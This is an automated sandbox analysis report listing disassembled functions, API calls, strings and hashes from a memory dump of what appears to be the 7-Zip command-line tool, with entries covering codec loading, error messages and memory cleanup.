Function 0099AB74 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 0099ABC9
free.MSVCRT ref: 0099ACF3
free.MSVCRT ref: 0099ACFE
free.MSVCRT ref: 0099AD95
memmove.MSVCRT(?), ref: 0099ADCB
free.MSVCRT ref: 0099AE70
free.MSVCRT ref: 0099AF7F

Part of subcall function 009994A8: free.MSVCRT ref: 009994DB
Part of subcall function 009994A8: free.MSVCRT ref: 009994E3
Part of subcall function 009994A8: free.MSVCRT ref: 009994F0
Part of subcall function 009994A8: free.MSVCRT ref: 0099951C
Part of subcall function 009994A8: free.MSVCRT ref: 00999525
Part of subcall function 009994A8: free.MSVCRT ref: 0099952D
Part of subcall function 009994A8: free.MSVCRT ref: 0099953A

free.MSVCRT ref: 0099AEC2

Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2

Part of subcall function 0099A9FC: free.MSVCRT ref: 0099AA95
Part of subcall function 0099A9FC: free.MSVCRT ref: 0099AAC5
Part of subcall function 0099A9FC: free.MSVCRT ref: 0099AAD2

free.MSVCRT ref: 0099AEFA
GetProcAddress.KERNEL32 ref: 0099AF4D

Strings

Codecs\, xrefs: 0099AE99
Formats\, xrefs: 0099AED1
SetCodecs, xrefs: 0099AF43
7z.dll, xrefs: 0099AE3C, 0099AE89

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove$AddressProc
String ID: 7z.dll$Codecs\$Formats\$SetCodecs
API String ID: 4053071709-2499791885
Opcode ID: c5c5cebdfb8b1fe3bc9f48e8b3820ba4ea19430a76db094a28c5f74b8e2b3a45
Instruction ID: 3ba21a93eb612253f5ceafd5fd6620cda966fcf64ca80eeec0765d0ab1065282
Opcode Fuzzy Hash: c5c5cebdfb8b1fe3bc9f48e8b3820ba4ea19430a76db094a28c5f74b8e2b3a45
Instruction Fuzzy Hash: C7B1AE67218AC196CF20EB29E4803AFB764F385788F508112EB8E47B65DF7CC959D742

Function 009B1850 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 009B1877
fputs.MSVCRT ref: 009B190A
LeaveCriticalSection.KERNEL32 ref: 009B1A44

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

fputs.MSVCRT ref: 009B194D

Part of subcall function 009726A0: fputs.MSVCRT ref: 009726C1

fputs.MSVCRT ref: 009B19CB
fputs.MSVCRT ref: 009B19EA
LeaveCriticalSection.KERNEL32 ref: 009B1A51

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

free.MSVCRT ref: 009B1A14

Strings

Everything is Ok, xrefs: 009B1903
Can't allocate required memory!, xrefs: 009B19E3
p, xrefs: 009B19A4
ERROR: , xrefs: 009B19C4
Sub items Errors: , xrefs: 009B1946

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
API String ID: 676172275-580504279
Opcode ID: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
Instruction ID: 16ef45a3c667e873258735b352086e56515eece5dd2666a0ae6d40cef92b7d32
Opcode Fuzzy Hash: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
Instruction Fuzzy Hash: F9515162345A81A2DB2D9F35EAB43ED7324F784BA0F848126DB6E47651CF38D4A4C300

Function 009938E8 Relevance: 22.8, APIs: 13, Strings: 2, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0099373C: free.MSVCRT ref: 009937FB

memmove.MSVCRT ref: 0099396F
free.MSVCRT ref: 00993986
free.MSVCRT ref: 00993A11
_CxxThrowException.MSVCRT ref: 00993A5F
free.MSVCRT ref: 00993AD3

Part of subcall function 00993864: free.MSVCRT ref: 00993877
Part of subcall function 00993864: free.MSVCRT ref: 00993892
Part of subcall function 00993864: free.MSVCRT ref: 0099389B
Part of subcall function 00993864: free.MSVCRT ref: 009938C6
Part of subcall function 00993864: free.MSVCRT ref: 009938CE

Strings

Duplicate archive path:, xrefs: 00993C07
Cannot find archive, xrefs: 00993A42

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmemmove
String ID: Cannot find archive$Duplicate archive path:
API String ID: 3934437811-2067063536
Opcode ID: 15ebe3c882bc9668213b7dd33c6c16c3777921ba145b699e337e3eca45f7d6ba
Instruction ID: 2941b07c8010c551baf9ea342680a204e57fad4409a7f61fbe370018e5d971d7
Opcode Fuzzy Hash: 15ebe3c882bc9668213b7dd33c6c16c3777921ba145b699e337e3eca45f7d6ba
Instruction Fuzzy Hash: 7EA17473325A8582CE20EF1AE49065EB365F7C5B90F548512EF9E07B29DF38C945CB10

Function 009A42A2 Relevance: 21.3, APIs: 13, Strings: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memmove.MSVCRT ref: 009A4324
free.MSVCRT ref: 009A441A
free.MSVCRT ref: 009A4425

Strings

, xrefs: 009A4466

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-3916222277
Opcode ID: 3aa71f5739002ec70ae4d321f5bd210f1a65664215592b72844cec7c5cd73cb9
Instruction ID: 49dea9e6d21ac827adca9323e4c5c61ad0c50e598a5cedfd3443e2d693f05e89
Opcode Fuzzy Hash: 3aa71f5739002ec70ae4d321f5bd210f1a65664215592b72844cec7c5cd73cb9
Instruction Fuzzy Hash: 29D13B37209AC496CB21DF29E0902AEBB60F7D6B84F545016EB8E43B29DF7CC549CB50

Function 009991E0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00999205
GetProcAddress.KERNEL32 ref: 00999219
GetProcAddress.KERNEL32 ref: 0099922D
GetProcAddress.KERNEL32 ref: 00999257
memmove.MSVCRT ref: 009992F0
GetProcAddress.KERNEL32 ref: 0099931C

Strings

GetMethodProperty, xrefs: 00999222
GetHashers, xrefs: 00999315
CreateEncoder, xrefs: 0099920E
CreateDecoder, xrefs: 009991FB
GetNumberOfMethods, xrefs: 00999245

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AddressProc$memmove
String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
API String ID: 2879976980-73314117
Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
Instruction ID: 4e6ef23917e1304d46eb1e41155942788ff931d5da0920efe644f5382affbf3f
Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
Instruction Fuzzy Hash: 0E417B32601A4196DF30DF29F89075EB365F784788F40012ADB8E83B55EF78D945CB00

Function 009B1BC0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 250COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B1CF9

Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

fputs.MSVCRT ref: 009B1DEE
fputs.MSVCRT ref: 009B1F07
fputs.MSVCRT ref: 009B1F5C

Part of subcall function 009B171C: fputs.MSVCRT ref: 009B1744
Part of subcall function 009B171C: fputs.MSVCRT ref: 009B1758
Part of subcall function 009B171C: free.MSVCRT ref: 009B176B

Part of subcall function 00976618: FormatMessageW.KERNEL32 ref: 00976676
Part of subcall function 00976618: LocalFree.KERNEL32 ref: 00976698

Part of subcall function 00972320: free.MSVCRT ref: 0097237E
Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
Part of subcall function 00972320: free.MSVCRT ref: 009723C4

free.MSVCRT ref: 009B1F86

Strings

ERRORS:, xrefs: 009B1CBF, 009B1CF2
Can't allocate required memory, xrefs: 009B1F55
WARNINGS:, xrefs: 009B1DB4, 009B1DE7
ERROR: , xrefs: 009B1F00

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free$FormatFreeLocalMessagefputcmemset
String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
API String ID: 2553544393-24972044
Opcode ID: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
Instruction ID: dc5ad51e3dfababc4c3c1b95989ba66db1f508ee1f29a95a3177e6d61b6323a9
Opcode Fuzzy Hash: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
Instruction Fuzzy Hash: DFA17F777146C49ACA39EF72D6A03EE7725F784B90F888126DB5E0B611DF68D8A4C310

Function 009B949B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B94EE
_CxxThrowException.MSVCRT ref: 009BA5E1
free.MSVCRT ref: 009BA5EF
free.MSVCRT ref: 009BA61C
free.MSVCRT ref: 009BA62E
free.MSVCRT ref: 009BA696
free.MSVCRT ref: 009BA69E
free.MSVCRT ref: 009BA6B0

Strings

Decoding ERROR, xrefs: 009B94E7

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrowfputs
String ID: Decoding ERROR
API String ID: 117389134-2585761706
Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
Instruction ID: 69d0933ed36bf7ce59572e3eff12e0317af532730b0ee6e95c8bc4f85ed65514
Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
Instruction Fuzzy Hash: 9231C4A33699C181CA30EB25EA803EEB361F7C17A0F449522DB9E47769DF78C985C701

Function 0099A7FC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 123libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00976464: FreeLibrary.KERNELBASE(?,?,?,009764E7), ref: 00976475

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

GetProcAddress.KERNEL32 ref: 0099A8CA
GetProcAddress.KERNEL32 ref: 0099A8E8
GetProcAddress.KERNEL32 ref: 0099A908
free.MSVCRT ref: 0099A985
free.MSVCRT ref: 0099A996

Strings

CreateObject, xrefs: 0099A8FD
SetLargePageMode, xrefs: 0099A8BF
SetCaseSensitive, xrefs: 0099A8DD

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AddressProcfree$FreeLibrarymemmove
String ID: CreateObject$SetCaseSensitive$SetLargePageMode
API String ID: 852969883-606380122
Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
Instruction ID: b1b2052740730f05ddf7bb60c20c56d99ae25d324e5168a2ffc5f96f919e6e85
Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
Instruction Fuzzy Hash: 7141AF36200B4087DF24EF2AE85075E7364FB85B98F4885249F9E47765EF38D986C380

Function 009BB480 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 229stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 009BB723
fputs.MSVCRT ref: 009BB743

Part of subcall function 009738C8: memmove.MSVCRT(0097A0E5), ref: 00973907

Part of subcall function 00973A64: memmove.MSVCRT ref: 00973AAA

GetTickCount.KERNEL32 ref: 009BB49E

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

strcmp.MSVCRT ref: 009BB4E3
wcscmp.MSVCRT ref: 009BB502
strcmp.MSVCRT ref: 009BB568

Strings

. , xrefs: 009BB6AC

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memmovestrcmp$CountTickfputsfreewcscmp
String ID: .
API String ID: 591578422-4150638102
Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
Instruction ID: c41096fb3390eb610dcec926f70b6b04fb627c33f6f49d7a31fdf5a0a3d4b18d
Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
Instruction Fuzzy Hash: 36A13677700A84EBCA29DF2AD69029D7361F794B90F808016EB5E47B51DFB4E8B6C700

Function 00999D98 Relevance: 12.1, APIs: 8, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00999BCC: free.MSVCRT ref: 00999C11
Part of subcall function 00999BCC: free.MSVCRT ref: 00999C19
Part of subcall function 00999BCC: free.MSVCRT ref: 00999C3B

Part of subcall function 00999BCC: free.MSVCRT ref: 00999D2A

wcscmp.MSVCRT ref: 00999E66
free.MSVCRT ref: 00999ECA
free.MSVCRT ref: 00999ED4
free.MSVCRT ref: 00999F13
free.MSVCRT ref: 00999F1B
free.MSVCRT ref: 00999F28
free.MSVCRT ref: 00999F49
free.MSVCRT ref: 00999F51

Part of subcall function 00973404: free.MSVCRT ref: 00973431
Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmovewcscmp
String ID:
API String ID: 3584677832-0
Opcode ID: d0aa5396e947f703ac514a2bac08324cffc8975aa9933586a56ea8b49374fbdb
Instruction ID: fbc91cb3ff54f12c144ffcab3572a9a657e52386d74ca28a6caf86b47a7511a5
Opcode Fuzzy Hash: d0aa5396e947f703ac514a2bac08324cffc8975aa9933586a56ea8b49374fbdb
Instruction Fuzzy Hash: 4641F723318A4091CE10EF1AE84026FA765F7C5BE8F849116EF6E47769DF39C84AC700

Function 009B2ECC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B2F7E
fputs.MSVCRT ref: 009B2F9D
free.MSVCRT ref: 009B2FB6
free.MSVCRT ref: 009B2FC1

Part of subcall function 00972C78: free.MSVCRT ref: 00972CAE

Part of subcall function 00972320: free.MSVCRT ref: 0097237E
Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
Part of subcall function 00972320: free.MSVCRT ref: 009723C4

free.MSVCRT ref: 009B2FCC

Strings

= , xrefs: 009B2F96

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$fputs
String ID: =
API String ID: 2444650769-2525689732
Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
Instruction ID: 45abac4953e26a8f7765f26790cf0b34ac8234bcf2b170498149faa974c779bc
Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
Instruction Fuzzy Hash: 3121746331854095CA20EB16E9917AEA730EBD57E4F849222FF5E47779DF28C945C700

Function 009BE16E Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 009BE1C2
__setusermatherr.MSVCRT ref: 009BE211
_initterm.MSVCRT ref: 009BE225
__getmainargs.MSVCRT ref: 009BE256
_initterm.MSVCRT ref: 009BE26A
_cexit.MSVCRT ref: 009BE29D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
Instruction ID: 3157ab7d0dd334d02d1d183ebce563b73b28ee565446e5599868882fc9fecb12
Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
Instruction Fuzzy Hash: 68313A75114B42CADB40DF28FAA439A77A6F784BB4F504226E6AA436B5DF3CC845CB00

Function 009BE1A6 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 009BE1C2
__setusermatherr.MSVCRT ref: 009BE211
_initterm.MSVCRT ref: 009BE225
__getmainargs.MSVCRT ref: 009BE256
_initterm.MSVCRT ref: 009BE26A
_cexit.MSVCRT ref: 009BE29D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction ID: 9fc5513c0cd9cc20c213060102e5ead8c3596a88de282bc277cbfe8dc98d2585
Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction Fuzzy Hash: 7B21FD75214B4286EB00DF28FD6439A7765F7847B4F501226E6A9437B5DF3CC445CB00

Function 009BE139 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 009BE1C2
__setusermatherr.MSVCRT ref: 009BE211
_initterm.MSVCRT ref: 009BE225
__getmainargs.MSVCRT ref: 009BE256
_initterm.MSVCRT ref: 009BE26A
_cexit.MSVCRT ref: 009BE29D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction ID: 9fc5513c0cd9cc20c213060102e5ead8c3596a88de282bc277cbfe8dc98d2585
Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction Fuzzy Hash: 7B21FD75214B4286EB00DF28FD6439A7765F7847B4F501226E6A9437B5DF3CC445CB00

Function 009BE15A Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 009BE1C2
__setusermatherr.MSVCRT ref: 009BE211
_initterm.MSVCRT ref: 009BE225
__getmainargs.MSVCRT ref: 009BE256
_initterm.MSVCRT ref: 009BE26A
_cexit.MSVCRT ref: 009BE29D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction ID: 9fc5513c0cd9cc20c213060102e5ead8c3596a88de282bc277cbfe8dc98d2585
Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction Fuzzy Hash: 7B21FD75214B4286EB00DF28FD6439A7765F7847B4F501226E6A9437B5DF3CC445CB00

Function 00994610 Relevance: 8.8, APIs: 7, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 009A3EE0: free.MSVCRT ref: 009A3F45

free.MSVCRT ref: 00994633
free.MSVCRT ref: 0099463C
free.MSVCRT ref: 00994646
free.MSVCRT ref: 00994672
free.MSVCRT ref: 0099467A
free.MSVCRT ref: 00994687
free.MSVCRT ref: 009946BA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
Instruction ID: ab929c759c24a2cb037012af6170544b8d406001fd5fd512f4da10ed4d01c385
Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
Instruction Fuzzy Hash: 5B118C63764A8496CA21BF2BD9916292324FB93BA07588221EF2D17795DF24C863C310

Function 0099419C Relevance: 8.8, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009941B9
free.MSVCRT ref: 009941C5
free.MSVCRT ref: 009941D1
free.MSVCRT ref: 009941DD
free.MSVCRT ref: 009941E6
free.MSVCRT ref: 009941EF
free.MSVCRT ref: 009941F8

Memory Dump Source

